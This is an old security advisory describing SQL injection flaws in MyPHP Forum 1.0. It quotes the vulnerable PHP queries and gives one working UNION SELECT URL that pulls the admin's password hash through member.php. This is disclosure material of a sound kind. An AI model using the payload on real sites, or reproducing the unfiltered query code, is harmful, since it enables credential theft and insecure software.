|
/*==========================================*/ // GHC -> MyPHP Forum <- ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /*==========================================*/ [Product Description] MyPHP Forum is a simple message board script with limited features. [Summary] Several SQL Injection vulnerabilities may lead to viewing of sensetive information, including hash of user's password. [Details] Positive part of user outbound variables used as they are in SQL queries. [1] script name: forum.php ---[code]--- $query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error()); $nav = mysql_fetch_array($query); ---[/code]--- Possible SQL injection through $fid variable that has no filtration. [2] script name: member.php ---[code]--- if($action == "viewpro") { $member = $HTTP_GET_VARS['member']; $sql = "SELECT * FROM $db_member WHERE username='$member'"; $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql"); $member = mysql_fetch_array($query); ---[/code]--- SQL code injection member.php?action=viewpro&member=[SQL code] [example of exploit] member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1 will show administrator's name and password hash (in the "Yahoo" field). Password cripted by encrypt() function: -[code]- function encrypt($string) { $crypted = crypt(md5($string), md5($string)); return $crypted; } -[/code]- [3] script name: forgot.php ---[code]--- $email = $_REQUEST['email']; if (isset($email)) { $sql="SELECT * FROM $db_member WHERE email='$email'"; ... $result = mysql_query("SELECT username FROM $db_member WHERE email='$email'"); $username = mysql_result($result, 0); $msg = " Hello $username, ---[code]--- $email variable has no filtration. IMPACT: Possible SQL injection through this variable. [4] script name: include.php This is the most important script that is the part of all others. $nbuser & $nbpass variables are not filtering. ---[code]--- $query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'") ---[/code]--- IMPACT: possible SQL injection through $nbuser. P.S. all bugs are actual for magic_quotes_gpc=0. /* ================================================== */ /* www.ghc.ru -- security games & challenges */ /* ================================================== */ /* greets to: RST.void.ru, D0G4 & all quest hunters %)*/ /* ================================================== */